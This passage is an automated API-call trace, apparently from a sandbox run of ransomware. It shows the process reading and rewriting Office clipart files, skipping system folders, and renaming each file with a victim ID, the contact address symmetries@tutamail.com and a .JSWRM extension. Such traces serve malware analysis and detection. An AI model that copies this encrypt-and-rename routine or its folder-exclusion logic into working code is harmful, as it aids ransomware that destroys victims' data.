lpDistanceToMoveHigh=0x0) returned 0x0 [0093.912] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x7ce0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x7ce0, lpOverlapped=0x0) returned 1 [0093.912] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0093.913] CloseHandle (hObject=0x314) returned 1 [0093.913] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210288 [0093.913] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0093.913] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0093.913] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0093.913] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0093.913] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0093.913] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0093.913] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a300 [0093.913] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a300, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0093.913] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a300 | out: hHeap=0x1e0000) returned 1 [0093.913] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d140 [0093.913] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2472c8 [0093.913] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d140 | out: hHeap=0x1e0000) returned 1 [0093.913] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0093.913] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02058U.BMP" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02058u.bmp"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02058U.BMP.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02058u.bmp.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0093.914] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2472c8 | out: hHeap=0x1e0000) returned 1 [0093.914] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210288 | out: hHeap=0x1e0000) returned 1 [0093.914] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210e68 | out: hHeap=0x1e0000) returned 1 [0093.914] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x101e2909, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x101e2909, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x101e2909, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x7ce0, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="PH02062U.BMP", cAlternateFileName="")) returned 1 [0093.914] lstrcmpiW (lpString1="PH02062U.BMP", lpString2=".") returned 1 [0093.914] lstrcmpiW (lpString1="PH02062U.BMP", lpString2="..") returned 1 [0093.914] lstrcmpiW (lpString1="PH02062U.BMP", lpString2="...") returned 1 [0093.914] lstrcmpiW (lpString1="PH02062U.BMP", lpString2="windows") returned -1 [0093.914] lstrcmpiW (lpString1="PH02062U.BMP", lpString2="recovery") returned -1 [0093.914] lstrcmpiW (lpString1="PH02062U.BMP", lpString2="perflogs") returned 1 [0093.914] lstrcmpiW (lpString1="PH02062U.BMP", lpString2="documents and settings") returned 1 [0093.914] lstrcmpiW (lpString1="PH02062U.BMP", lpString2="$RECYCLE.BIN") returned 1 [0093.914] lstrcmpiW (lpString1="PH02062U.BMP", lpString2="system volume information") returned -1 [0093.914] lstrcmpiW (lpString1="PH02062U.BMP", lpString2="msocache") returned 1 [0093.914] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0093.915] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH02062U.BMP", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0093.915] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH02062U.BMP", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PH02062U.BMP", lpUsedDefaultChar=0x0) returned 12 [0093.915] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0093.915] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411f0 [0093.915] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH02062U.BMP", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0093.915] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH02062U.BMP", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PH02062U.BMP", lpUsedDefaultChar=0x0) returned 12 [0093.915] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411f0 | out: hHeap=0x1e0000) returned 1 [0093.915] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0093.915] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2103b8 | out: hHeap=0x1e0000) returned 1 [0093.915] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0093.915] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0093.915] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0093.915] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02062U.BMP" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02062u.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0093.915] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=31968) returned 1 [0093.915] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0093.916] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x7ce0) returned 0x24d210 [0093.919] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x7ce0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x7ce0, lpOverlapped=0x0) returned 1 [0094.117] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0094.117] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x7ce0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x7ce0, lpOverlapped=0x0) returned 1 [0094.117] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0094.118] CloseHandle (hObject=0x314) returned 1 [0094.118] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0094.118] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0094.118] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0094.118] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0094.118] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0094.118] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0094.118] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0094.118] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3d8 [0094.119] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3d8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0094.119] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3d8 | out: hHeap=0x1e0000) returned 1 [0094.119] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d878 [0094.119] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2473c0 [0094.119] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d878 | out: hHeap=0x1e0000) returned 1 [0094.119] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0094.119] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02062U.BMP" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02062u.bmp"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02062U.BMP.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02062u.bmp.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0094.120] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2473c0 | out: hHeap=0x1e0000) returned 1 [0094.120] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0094.120] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0094.120] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1022edb4, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1022edb4, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1022edb4, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x7297, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="PH02069J.JPG", cAlternateFileName="")) returned 1 [0094.120] lstrcmpiW (lpString1="PH02069J.JPG", lpString2=".") returned 1 [0094.120] lstrcmpiW (lpString1="PH02069J.JPG", lpString2="..") returned 1 [0094.120] lstrcmpiW (lpString1="PH02069J.JPG", lpString2="...") returned 1 [0094.120] lstrcmpiW (lpString1="PH02069J.JPG", lpString2="windows") returned -1 [0094.120] lstrcmpiW (lpString1="PH02069J.JPG", lpString2="recovery") returned -1 [0094.120] lstrcmpiW (lpString1="PH02069J.JPG", lpString2="perflogs") returned 1 [0094.120] lstrcmpiW (lpString1="PH02069J.JPG", lpString2="documents and settings") returned 1 [0094.120] lstrcmpiW (lpString1="PH02069J.JPG", lpString2="$RECYCLE.BIN") returned 1 [0094.120] lstrcmpiW (lpString1="PH02069J.JPG", lpString2="system volume information") returned -1 [0094.120] lstrcmpiW (lpString1="PH02069J.JPG", lpString2="msocache") returned 1 [0094.120] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0094.120] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH02069J.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0094.121] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH02069J.JPG", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PH02069J.JPG", lpUsedDefaultChar=0x0) returned 12 [0094.121] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0094.121] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0094.121] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH02069J.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0094.121] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH02069J.JPG", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PH02069J.JPG", lpUsedDefaultChar=0x0) returned 12 [0094.121] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0094.121] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210d38 [0094.121] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0094.121] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0094.121] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0094.121] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ad8 [0094.121] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02069J.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02069j.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0094.122] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=29335) returned 1 [0094.122] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0094.122] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x7290) returned 0x24d210 [0094.123] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x7290, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x7290, lpOverlapped=0x0) returned 1 [0094.126] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0094.126] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x7290, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x7290, lpOverlapped=0x0) returned 1 [0094.126] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0094.127] CloseHandle (hObject=0x314) returned 1 [0094.127] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210c08 [0094.127] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0094.127] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0094.127] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0094.127] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0094.127] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0094.127] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0094.127] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a408 [0094.127] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a408, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0094.127] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a408 | out: hHeap=0x1e0000) returned 1 [0094.127] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23da70 [0094.127] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247b80 [0094.127] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23da70 | out: hHeap=0x1e0000) returned 1 [0094.127] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0094.127] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02069J.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02069j.jpg"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02069J.JPG.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02069j.jpg.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0094.129] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247b80 | out: hHeap=0x1e0000) returned 1 [0094.129] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210c08 | out: hHeap=0x1e0000) returned 1 [0094.129] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ad8 | out: hHeap=0x1e0000) returned 1 [0094.129] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1022edb4, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1022edb4, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1022edb4, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x7db8, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="PH02071U.BMP", cAlternateFileName="")) returned 1 [0094.129] lstrcmpiW (lpString1="PH02071U.BMP", lpString2=".") returned 1 [0094.129] lstrcmpiW (lpString1="PH02071U.BMP", lpString2="..") returned 1 [0094.129] lstrcmpiW (lpString1="PH02071U.BMP", lpString2="...") returned 1 [0094.129] lstrcmpiW (lpString1="PH02071U.BMP", lpString2="windows") returned -1 [0094.129] lstrcmpiW (lpString1="PH02071U.BMP", lpString2="recovery") returned -1 [0094.129] lstrcmpiW (lpString1="PH02071U.BMP", lpString2="perflogs") returned 1 [0094.129] lstrcmpiW (lpString1="PH02071U.BMP", lpString2="documents and settings") returned 1 [0094.129] lstrcmpiW (lpString1="PH02071U.BMP", lpString2="$RECYCLE.BIN") returned 1 [0094.129] lstrcmpiW (lpString1="PH02071U.BMP", lpString2="system volume information") returned -1 [0094.129] lstrcmpiW (lpString1="PH02071U.BMP", lpString2="msocache") returned 1 [0094.129] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0094.129] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH02071U.BMP", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0094.129] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH02071U.BMP", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PH02071U.BMP", lpUsedDefaultChar=0x0) returned 12 [0094.129] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0094.129] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0094.129] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH02071U.BMP", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0094.129] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH02071U.BMP", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PH02071U.BMP", lpUsedDefaultChar=0x0) returned 12 [0094.129] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0094.129] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210158 [0094.129] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210d38 | out: hHeap=0x1e0000) returned 1 [0094.129] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0094.129] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0094.129] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0094.129] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02071U.BMP" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02071u.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0094.130] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=32184) returned 1 [0094.130] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0094.130] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x7db0) returned 0x24d210 [0094.131] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x7db0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x7db0, lpOverlapped=0x0) returned 1 [0094.134] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0094.134] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x7db0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x7db0, lpOverlapped=0x0) returned 1 [0094.134] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0094.135] CloseHandle (hObject=0x314) returned 1 [0094.135] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0094.135] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0094.135] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0094.135] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0094.135] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0094.135] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0094.135] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0094.135] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a210 [0094.136] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a210, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0094.136] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a210 | out: hHeap=0x1e0000) returned 1 [0094.136] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cd50 [0094.136] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247a88 [0094.136] HeapFree (in: 